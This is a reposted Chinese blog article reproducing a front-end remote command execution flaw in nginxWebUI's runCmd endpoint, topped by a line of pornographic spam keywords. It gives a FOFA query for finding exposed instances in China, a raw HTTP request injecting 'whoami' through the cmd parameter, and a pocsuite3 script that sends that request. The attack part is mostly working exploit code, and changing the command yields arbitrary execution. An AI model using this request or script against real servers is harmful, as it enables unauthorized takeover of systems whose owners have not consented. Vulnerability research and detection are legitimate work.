国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

漏洞復(fù)現(xiàn)-nginxWebUI runCmd前臺(tái)遠(yuǎn)程命令執(zhí)行漏洞(附漏洞檢測(cè)腳本)

這篇具有很好參考價(jià)值的文章主要介紹了漏洞復(fù)現(xiàn)-nginxWebUI runCmd前臺(tái)遠(yuǎn)程命令執(zhí)行漏洞(附漏洞檢測(cè)腳本)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

免責(zé)聲明

文章中涉及的漏洞均已修復(fù),敏感信息均已做打碼處理,文章僅做經(jīng)驗(yàn)分享用途,切勿當(dāng)真,未授權(quán)的攻擊屬于非法行為!文章中敏感信息均已做多層打馬處理。傳播、利用本文章所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負(fù)責(zé),作者不為此承擔(dān)任何責(zé)任,一旦造成后果請(qǐng)自行負(fù)責(zé)

漏洞描述

nginxWebUI由于未對(duì)用戶的輸入進(jìn)行嚴(yán)格過(guò)濾,導(dǎo)致任意命令執(zhí)行漏洞。該漏洞利用條件簡(jiǎn)單,漏洞危害較高。

nginxwebui runcmd遠(yuǎn)程命令執(zhí)行漏洞,安全,web安全,網(wǎng)絡(luò)

fofa語(yǔ)句

app="nginxWebUI" && country="CN"

poc加檢測(cè)

GET /AdminPage/conf/runCmd?cmd=whoami&&echo%20nginx HTTP/1.1
Host: 
Cookie: SOLONID=a64c90e89a5945108c4374d2beac5af1; SOLONID2=8105754505cbebbbdfbd4dd84e7bc313; Hm_lvt_8acef669ea66f479854ecd328d1f348f=1705172536; Hm_lpvt_8acef669ea66f479854ecd328d1f348f=1705172536
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate

nginxwebui runcmd遠(yuǎn)程命令執(zhí)行漏洞,安全,web安全,網(wǎng)絡(luò)

poc腳本

腳本使用pocsuite框架

# -*- coding: utf-8 -*-
# 2024/1/14

from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, VUL_TYPE
from pocsuite3.api import OrderedDict, OptString


class nginxwebui_runcmd_RCE(POCBase):
    author = '煉金術(shù)師諸葛亮'
    createDate = '2024-1-14'
    name = 'nginxWebUI-runCmd-RCE'
    desc = 'nginxWebUI runCmd-前臺(tái)RCE漏洞'  # 漏洞簡(jiǎn)要描述

    def _verify(self):
        result = {}
        path = "/AdminPage/conf/runCmd?cmd=whoami%26%26echo%20nginx"
        url = self.url + path
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
            'Cookie': 'SOLONID=ab4603d571394000a48398f2383fdc26; Hm_lvt_8acef669ea66f479854ecd328d1f348f=1705042515; Hm_lpvt_8acef669ea66f479854ecd328d1f348f=1705042611',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
            'Upgrade-Insecure-Requests': '1'
        }
        r = requests.get(url,headers=headers)
        try:

            if r.status_code == 200 and 'root' in r.text:
                result['VerifyInfo'] = {}

            return self.parse_output(result)
        except Exception as e:
            pass



register_poc(nginxwebui_runcmd_RCE)

腳本利用

nginxwebui runcmd遠(yuǎn)程命令執(zhí)行漏洞,安全,web安全,網(wǎng)絡(luò)文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-854926.html

到了這里,關(guān)于漏洞復(fù)現(xiàn)-nginxWebUI runCmd前臺(tái)遠(yuǎn)程命令執(zhí)行漏洞(附漏洞檢測(cè)腳本)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 漏洞復(fù)現(xiàn) - - -Struts2(s2-045)遠(yuǎn)程命令執(zhí)行漏洞

    漏洞復(fù)現(xiàn) - - -Struts2(s2-045)遠(yuǎn)程命令執(zhí)行漏洞

    Struts2是一個(gè)基于MVC設(shè)計(jì)模式的Web應(yīng)用框架,它本質(zhì)上相當(dāng)于一個(gè)servlet,在MVC設(shè)計(jì)模式中,Struts2作為控制器(Controller)來(lái)建立模型與視圖的數(shù)據(jù)交互。Struts 2是Struts的下一代產(chǎn)品,是在 struts 1和WebWork的技術(shù)基礎(chǔ)上進(jìn)行了合并的全新的Struts 2框架。其全新的Struts 2的體系結(jié)構(gòu)與St

    2024年01月20日
    瀏覽(31)
  • xxl-job遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)

    xxl-job遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)

    XXL-JOB是一個(gè)分布式任務(wù)調(diào)度平臺(tái),其核心設(shè)計(jì)目標(biāo)是開(kāi)發(fā)迅速、學(xué)習(xí)簡(jiǎn)單、輕量級(jí)、易擴(kuò)展?,F(xiàn)已開(kāi)放源代碼并接入多家公司線上產(chǎn)品線,開(kāi)箱即用。XXL-JOB分為admin和executor兩端,前者為后臺(tái)管理頁(yè)面,后者是任務(wù)執(zhí)行的客戶端。executor默認(rèn)沒(méi)有配置認(rèn)證,未授權(quán)的攻擊者可

    2024年02月11日
    瀏覽(16)
  • CVE-2021-22205 GitLab 遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)

    CVE-2021-22205 GitLab 遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)

    目錄 一、漏洞信息 二、環(huán)境搭建 三、復(fù)現(xiàn)過(guò)程 1.測(cè)試漏洞 2.漏洞利用,反彈shell 四、修復(fù)建議 一、漏洞信息 漏洞名稱(chēng) GITLAB 遠(yuǎn)程命令執(zhí)行漏洞 漏洞編號(hào) CVE-2021-22205 危害等級(jí) 高危 CVSS評(píng)分 6.5 漏洞廠商 Ruby 受影響版本 11.9 = Gitlab CE/EE 13.8.8;13.9 = Gitlab CE/EE 13.9.6;13.10 = Gitlab

    2024年02月05日
    瀏覽(25)
  • 【漏洞復(fù)現(xiàn)】廈門(mén)才茂通信網(wǎng)關(guān)formping遠(yuǎn)程命令執(zhí)行漏洞

    【漏洞復(fù)現(xiàn)】廈門(mén)才茂通信網(wǎng)關(guān)formping遠(yuǎn)程命令執(zhí)行漏洞

    廈門(mén)才茂通信網(wǎng)關(guān)formping存在遠(yuǎn)程命令執(zhí)行漏洞,攻擊者可通過(guò)特定payload對(duì)目標(biāo)服務(wù)器發(fā)起攻擊,造成不可估量的影響。 請(qǐng)勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測(cè)試,由于傳播、利用此文所提供的信息或者工具而造成的任何直接或者間接的后果及損失,均由使用者本人負(fù)責(zé),所

    2024年02月15日
    瀏覽(44)
  • 億賽通電子文檔安全管理系統(tǒng)遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)

    億賽通電子文檔安全管理系統(tǒng)遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)

    此文章僅用于技術(shù)交流,嚴(yán)禁用于對(duì)外發(fā)起惡意攻擊?。。?億賽通電子文檔安全管理系統(tǒng)(簡(jiǎn)稱(chēng):CDG)是一款電子文檔安全加密軟件,該系統(tǒng)利用驅(qū)動(dòng)層透明加密技術(shù),通過(guò)對(duì)電子文檔的加密保護(hù),防止內(nèi)部員工泄密和外部人員非法竊取企業(yè)核心重要數(shù)據(jù)資產(chǎn),對(duì)電子文檔進(jìn)

    2024年01月21日
    瀏覽(23)
  • HVV爆火漏洞:最新 WPS RCE (遠(yuǎn)程命令執(zhí)行) 復(fù)現(xiàn)

    HVV爆火漏洞:最新 WPS RCE (遠(yuǎn)程命令執(zhí)行) 復(fù)現(xiàn)

    最近HVV爆出的很火的WPS命令執(zhí)行漏洞,其實(shí)并不是0DAY,早在2019年就出現(xiàn)了,只不過(guò)最近EXP才公開(kāi)。接下來(lái)我們來(lái)復(fù)現(xiàn)一遍。 WPS Office 2023 個(gè)人版 11.1.0.15120 WPS Office 2019 企業(yè)版 11.8.2.12085 wps版本: WPS V11.1.0.12300 靶機(jī): windows 10 攻擊機(jī): ubuntu 20.04 ????IP:192.168.2.103 WPS 內(nèi)置了一

    2024年02月11日
    瀏覽(22)
  • Spring Data Commons遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)(CVE-2018-1273)

    Spring Data Commons遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)(CVE-2018-1273)

    一、漏洞說(shuō)明 Spring Data是一個(gè)用于簡(jiǎn)化數(shù)據(jù)庫(kù)訪問(wèn),并支持云服務(wù)的開(kāi)源框架,包含Commons、Gemfire、JPA、JDBC、MongoDB等模塊。此漏洞產(chǎn)生于Spring Data Commons組件,該組件為提供共享的基礎(chǔ)框架,適合各個(gè)子項(xiàng)目使用,支持跨數(shù)據(jù)庫(kù)持久化。 Spring Data Commons組件中存在遠(yuǎn)程代碼執(zhí)行

    2024年02月09日
    瀏覽(21)
  • 【IP-guard WebServer 遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)(0day)】

    【IP-guard WebServer 遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)(0day)】

    IP-guard是由溢信科技股份有限公司開(kāi)發(fā)的一款終端安全管理軟件,旨在幫助企業(yè)保護(hù)終端設(shè)備安全、數(shù)據(jù)安全、管理網(wǎng)絡(luò)使用和簡(jiǎn)化IT系統(tǒng)管理。 IP-guard Webserver遠(yuǎn)程命令執(zhí)行漏洞(RCE)的問(wèn)題,是因?yàn)榕f版本申請(qǐng)審批的文件預(yù)覽功能用到了一個(gè)開(kāi)源的插件 flexpaper,使用的這個(gè)

    2024年02月05日
    瀏覽(31)
  • 漏洞復(fù)現(xiàn)-SeaCMS_v10.1_遠(yuǎn)程命令執(zhí)行(CNVD-2020-22721)

    漏洞復(fù)現(xiàn)-SeaCMS_v10.1_遠(yuǎn)程命令執(zhí)行(CNVD-2020-22721)

    seacms_v10.1有效 cnvd-2020-22721 命令執(zhí)行漏洞 海洋CMS一套程序自適應(yīng)電腦、手機(jī)、平板、APP多個(gè)終端入口。 SeaCMS v10.1存在命令執(zhí)行漏洞,在w1aqhp/admin_ip.php下第五行使用set參數(shù),對(duì)用戶輸入沒(méi)有進(jìn)行任何處理,直接寫(xiě)入文件。攻擊者可利用該漏洞執(zhí)行惡意代碼,獲取服務(wù)器權(quán)限。

    2024年02月08日
    瀏覽(27)
  • Apache Struts2 S2-045遠(yuǎn)程命令執(zhí)行漏洞(CVE-2017-5638)復(fù)現(xiàn)

    Apache Struts2 S2-045遠(yuǎn)程命令執(zhí)行漏洞(CVE-2017-5638)復(fù)現(xiàn)

    Apache Struts2是Apache項(xiàng)目下的一個(gè)web 框架,幫助Java開(kāi)發(fā)者利用J2EE來(lái)開(kāi)發(fā)Web相關(guān)應(yīng)用。 Apache Struts2的Jakarta Multipart parser插件存在遠(yuǎn)程代碼執(zhí)行漏洞,攻擊者可以在使用該插件上傳文件時(shí),修改HTTP請(qǐng)求頭中的Content-Type值來(lái)觸發(fā)該漏洞,導(dǎo)致遠(yuǎn)程執(zhí)行代碼。 Struts 2.3.5 – Struts 2.3.3

    2024年02月15日
    瀏覽(31)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包